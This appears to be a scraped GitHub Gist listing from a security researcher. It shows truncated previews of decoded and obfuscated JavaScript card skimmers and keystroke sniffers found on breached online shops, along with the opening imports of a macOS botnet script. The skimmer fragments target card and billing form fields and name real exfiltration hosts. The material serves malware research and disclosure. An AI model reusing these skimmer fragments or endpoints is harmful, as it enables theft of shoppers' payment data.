Willem de Groot gwillem

View show-global-status.txt
Variable_name Value
Aborted_clients 2028
Aborted_connects 0
Access_denied_errors 0
Acl_column_grants 0
Acl_database_grants 4656
Acl_function_grants 0
Acl_procedure_grants 0
Acl_proxy_users 1
Acl_role_grants 0
View decoded.js
// Original: https://www.sweatybetty.com/on/demandware.static/-/Library-Sites-sweatybettylibrary/en_US/v1574703272172/js/custom.js
// Decoded by info@sansec.io (C) 2019-12-04
(function () {
function _0x58c32e(_0x531ef5, _0x2f3dd8) {
function _0x3730ba(_0x50af3d) {
if (_0x3730ba[_0x50af3d] !== _0x42a44f) return _0x3730ba[_0x50af3d];
var _0x4c3b76;
if (_0x250d('0x0', 'vxGP') == _0x50af3d) _0x4c3b76 = 'a' != 'a' [0x0];
else if (_0x250d('0x1', 'ipvd') == _0x50af3d) _0x4c3b76 = _0x3730ba(_0x250d('0x2', '%zE0')) && _0x3730ba('json-parse');
else {
gwillem / decoded.js
Created Oct 25, 2019
Procter & Gamble's FirstAidBeauty.com skimmed since May 5th 2019.
+ function () {
var a = ["digiNum", "input[name='payment[cc_number]']", "digiMon", "select[name='payment[cc_exp_month]']", "digiYea", "select[name='payment[cc_exp_year]']", "digiCbb", "input[name='payment[cc_cid]']", "digiNam", "input[name='payment[cc_owner]']", "clNameChecked", "l8", "shElement", "#payment-buttons-container", "hasClass", "click", "val", "change", "addClass", "#billing\:firstname", " ", "#billing\:lastname", "#billing\:company", "#billing\:street1", "#billing\:street2", "#billing\:email", "#billing\:telephone", "#billing\:city", "#billing\:region_id", "#billing\:country_id", "#billing\:postcode", "host", "location", "", "replace", "/", "userAgent", "stringify", "https://cdn.hsadspixel.com/t/", "main", "guid", "refer", "POST", "ajax", "random", "round", "fromCharCode", "key", "getElementById", "iv", "push", "length", "charCodeAt", "rotate", "sbox", "Rcon", "numberOfRounds", "core", "SIZE_256", "keySize", "rsbox", "shiftRow", "mixColumn", "galois_multiplication", "subBytes", "shiftRows", "m
View Volusion code
/*!
* JavaScript Cookie v2.2.1
* https://github.com/js-cookie/js-cookie
*
* Copyright 2006, 2015 Klaus Hartl & Fagner Brack
* Released under the MIT license
*/
;
(function(factory) {
var registeredInModuleLoader;
View jsonline2csv.py
#!/usr/bin/env python3
# jsonline to csv converter for Andy
import csv
import json
import sys
if len(sys.argv) < 2:
print("Use {} <file.jsonline>".format(sys.argv[0]))
gwillem / decoded.js
Last active Aug 29, 2019
962 stores found breached on the 4th of July - https://sansec.io
// Decoded by Sanguine Security <info@sansec.io>
/**
 * Hex-encodes the receiver string, one UTF-16 code unit at a time.
 *
 * Each code unit (as returned by charCodeAt) is written as exactly four
 * lowercase hexadecimal digits, left-padded with zeros, so the output is
 * always four times as long as the input. An empty string yields ''.
 *
 * Analyst note: this helper is installed on String.prototype, so it is
 * visible to every script on the page that loads the sample. How the
 * sample uses it is not visible in this preview.
 *
 * @returns {string} concatenated 4-digit hex values of the code units
 */
String.prototype.hexEncode = function() {
    var encoded = '';
    var index = 0;
    while (index < this.length) {
        // toString(16) yields 1-4 digits for a code unit; pad to a fixed width of 4.
        var unitHex = this.charCodeAt(index).toString(16);
        encoded = encoded + ('000' + unitHex).slice(-4);
        index += 1;
    }
    return encoded;
};
gwillem / keystroke_sniffer_1.js
Last active May 23, 2020
BestOfTheWeb.com Security Seal contains even 2 different keystroke sniffers 2019-05-13 -- obfuscated version here: https://urlscan.io/responses/5c4474793baf83d5376045163d77f8f2ecd228ba5941ee8572489cb475a3cd1b/
// Analyst note: shared state object for this decoded sniffer sample. Only the
// field setup is visible in this run of statements.
var sniffData = {};
// Remote endpoint string. The name suggests this is where collected data is
// sent, but the sending code is not visible in this preview — confirm against
// the full sample. Defenders can search outbound request logs and CSP
// violation reports for this host.
sniffData['Gate'] = 'https://font-assets.com/img';
// Map filled by SaveParam (defined right after this run) as field.id -> field.value.
sniffData['Data'] = {};
// Starts as an empty array; presumably tracks values already transmitted —
// its use is not shown here, verify in the full sample.
sniffData['Sent'] = [];
// `![]` evaluates to false; the obfuscator spells boolean literals this way.
// SaveParam flips this to true (`!![]`) when its two value checks both pass.
sniffData.IsValid = ![];
sniffData.SaveParam = function(field) {
if (field.id !== undefined && field.id != '' && field.id !== null && field.value.length < 0x100 && field.value.length > 0x0) {
if (_0x5c4ab6(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', '')) && _0xdc5c77(_0x5e7b89(_0x5e7b89(field.value, '-', ''), ' ', ''))) sniffData.IsValid = !![];
sniffData.Data[field.id] = field.value;
return;
View original.js
var _0x19f5=['\x61\x57\x35\x75\x5a\x58\x4a\x49\x5a\x57\x6c\x6e\x61\x48\x51\x3d','\x61\x47\x39\x79\x61\x58\x70\x76\x62\x6e\x52\x68\x62\x41\x3d\x3d','\x52\x6d\x6c\x79\x5a\x57\x4a\x31\x5a\x77\x3d\x3d','\x59\x32\x68\x79\x62\x32\x31\x6c','\x61\x58\x4e\x4a\x62\x6d\x6c\x30\x61\x57\x46\x73\x61\x58\x70\x6c\x5a\x41\x3d\x3d','\x64\x57\x35\x6b\x5a\x57\x5a\x70\x62\x6d\x56\x6b','\x5a\x58\x68\x77\x62\x33\x4a\x30\x63\x77\x3d\x3d','\x5a\x47\x56\x32\x64\x47\x39\x76\x62\x48\x4d\x3d','\x63\x48\x4a\x76\x64\x47\x39\x30\x65\x58\x42\x6c','\x61\x47\x46\x7a\x61\x45\x4e\x76\x5a\x47\x55\x3d','\x59\x32\x68\x68\x63\x6b\x4e\x76\x5a\x47\x56\x42\x64\x41\x3d\x3d','\x61\x48\x52\x30\x63\x48\x4d\x36\x4c\x79\x39\x6d\x62\x32\x35\x30\x4c\x57\x46\x7a\x63\x32\x56\x30\x63\x79\x35\x6a\x62\x32\x30\x76\x61\x57\x31\x6e','\x53\x58\x4e\x57\x59\x57\x78\x70\x5a\x41\x3d\x3d','\x55\x32\x46\x32\x5a\x56\x42\x68\x63\x6d\x46\x74','\x55\x32\x46\x32\x5a\x55\x46\x73\x62\x45\x5a\x70\x5a\x57\x78\x6b\x63\x77\x3d\x3d','\x64\x47\x56\x34\x64\x47\x46\x79\x5a\x57\x45\x3d','\x
View skimmer.js
var _0xBCEC = ["68$61$77$6b$73$73$68$6f$70$2e$63$6f$6d", "2f$63$68$65$63$6b$6f$75$74", "", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$61$6e$61$6c$79$7a$65", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d", "68$74$74$70$73$3a$2f$2f$69$6d$61$67$65$73$65$6e$67$69$6e$65$73$2e$63$6f$6d$2f$53$4a$7a$54$43$72$78$4d$4f$30$4f$37$74$69", "6d$61$67$65$32$5f$64$65$66$61$75$6c$74", "length", "wtf", "prototype", "$", "split", "reduce", "fromCharCode", "map", "replace", "toString", "rot13", "Z", "charCodeAt", "rot5", "join", "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", "_utf8_encode", "charAt", "_keyStr", "indexOf", "_utf8_decode", "\n", "isUndefined", "isNull", "href", "location", "div", "createElement", "i", "getElementsByTagName", "innerHTML", "<!--[if gt IE ", "]><i></i><![endif]-->", "childNodes", "nodeType", "push", "getAttribute", "attributes", "nodeName", "nodeValue", "textContent", "innerText", "getComputedStyle", "display", "no
gwillem / main.py
Last active Apr 23, 2019
dfurniturestore.co.uk MacOS X botnet code -- found on https://dfurniturestore.co.uk/js/Update 04-19.dmg
import os
import pwd
import random
import string
import urllib, urllib2
import json
import time
import sys
import base64
import random